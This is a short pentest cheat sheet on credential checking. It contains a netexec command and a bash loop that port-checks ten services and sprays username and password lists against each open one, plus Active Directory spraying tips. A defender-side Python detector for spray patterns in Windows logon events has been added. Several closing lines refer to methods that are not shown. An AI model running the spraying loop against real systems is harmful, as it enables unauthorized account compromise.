Checking Credentials
General way of checking a protocol
# General command:
netexec <protocol> "$IP" -u <username_or_file> -p <password_or_file> --continue-on-success --port <custom_port>
Automated way:
# First set the IP
IP=<IP_AddressToScan>
# If a service listens on a different port, change the port number in the list below:
for proto_port in "wmi:135" "rdp:3389" "winrm:5985" "ldap:389" "ssh:22" "mssql:1433" "nfs:2049" "smb:445" "ftp:21" "vnc:5900"; do
    # Split each "protocol:port" pair
    protocol=${proto_port%%:*}
    port=${proto_port##*:}
    echo "Checking $protocol on port $port..."
    # Only run netexec when the port answers within 3 seconds
    nc -z -w3 "$IP" "$port" &&
        echo "$protocol port $port is open. Running netexec..." &&
        netexec "$protocol" "$IP" -u usernames.txt -p passwords.txt --continue-on-success --port "$port"
done
For password spraying in Active Directory (AD), if standard password spraying does not seem to work, try using the Fully Qualified Domain Name (FQDN).
Example: era.secura.yzx (in the format name.domain).
Use the -d flag in netexec to specify the domain.
If you want to use specific usernames and passwords, replace usernames.txt and passwords.txt in the script with your actual username and password respectively.
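Seen from the defender's side, the loop above leaves a recognizable pattern: one source failing logons against many distinct accounts in a short time, with any successes mixed in because of --continue-on-success. The sketch below is an added example, not part of the original notes; it flags that pattern over constructed records modeled on Windows Security events 4625 (failed logon) and 4624 (successful logon), and the record layout, thresholds, and sample values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): (time, event_id, account, source_ip).
# 4625 = failed logon, 4624 = successful logon in the Windows Security log.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", 4625, "alice", "10.0.0.50"),
    ("2024-05-01T10:00:02", 4625, "bob", "10.0.0.50"),
    ("2024-05-01T10:00:03", 4625, "carol", "10.0.0.50"),
    ("2024-05-01T10:00:04", 4624, "dave", "10.0.0.50"),
    ("2024-05-01T10:00:05", 4625, "erin", "10.0.0.50"),
    # A single user mistyping a password: must not be flagged.
    ("2024-05-01T10:03:00", 4625, "alice", "10.0.0.77"),
    ("2024-05-01T10:03:20", 4625, "alice", "10.0.0.77"),
    ("2024-05-01T10:04:00", 4624, "alice", "10.0.0.77"),
]


def detect_spray(events, min_accounts=4, window=timedelta(minutes=5)):
    """Flag sources that fail logons against many distinct accounts in one window.

    Returns {source_ip: {"failed": [...], "succeeded": [...]}}. "succeeded" lists
    accounts that logged on from a flagged source inside the same window, which
    are the ones to treat as compromised and reset first.
    """
    by_source = defaultdict(list)
    for ts, event_id, account, source in events:
        by_source[source].append((datetime.fromisoformat(ts), event_id, account))

    findings = {}
    for source, rows in by_source.items():
        rows.sort()
        for i, (start, _, _) in enumerate(rows):
            in_window = [r for r in rows[i:] if r[0] - start <= window]
            failed = {acct for _, eid, acct in in_window if eid == 4625}
            if len(failed) >= min_accounts:
                ok = {acct for _, eid, acct in in_window if eid == 4624}
                findings[source] = {"failed": sorted(failed), "succeeded": sorted(ok)}
                break
    return findings


if __name__ == "__main__":
    for source, hit in detect_spray(SAMPLE_EVENTS).items():
        print(source, hit)
```

Counting distinct accounts per source, rather than total failures, is what separates a spray from one user repeatedly mistyping a password.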
If you have access to SMB, FTP, or any other service, check it, even if you don't get the pwned! message.
Make changes like this.
Checking whether a private key is valid for any user
If it asks for a password, try to crack it using the method below.